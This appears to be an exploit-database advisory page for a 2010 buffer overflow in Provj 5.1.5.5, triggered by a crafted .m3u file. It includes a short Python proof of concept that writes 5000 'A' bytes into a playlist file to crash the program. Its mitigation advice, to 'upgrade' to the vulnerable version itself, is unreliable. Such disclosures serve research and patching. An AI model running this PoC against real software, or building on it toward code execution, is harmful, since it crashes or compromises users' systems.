header-logo
Suggest Exploit
vendor:
Provj
by:
0v3r
9,3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Provj
Affected Version From: 5.1.5.5
Affected Version To: 5.1.5.5
Patch Exists: YES
Related CWE: N/A
CPE: a:clubdjpro:provj:5.1.5.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 EN
2010

Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC

A buffer overflow vulnerability exists in Provj 5.1.5.5 when a specially crafted .m3u file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to insufficient boundary checks when processing the .m3u file. A malicious user can create a specially crafted .m3u file and execute arbitrary code when the file is opened. This can be exploited to execute arbitrary code with the privileges of the user running the application.

Mitigation:

Upgrade to the latest version of Provj 5.1.5.5 or apply the appropriate patch.
Source

Exploit-DB raw data:

# Exploit Title: Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC
# Date: 11/30/2010
# Author: 0v3r
# Software Link: http://www.clubdjpro.com/files/provj5.exe
# Version: 5.1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A


#!/usr/bin/python

buff = "\x41" * 5000 

try:
 	f = open("exploit.m3u",'w')
	f.write(buff)
	f.close()
	print "[-] File created!\n" 
except:
	print "[-] Error occured!\n"

Navigation

Suggest Exploit

Services By CQR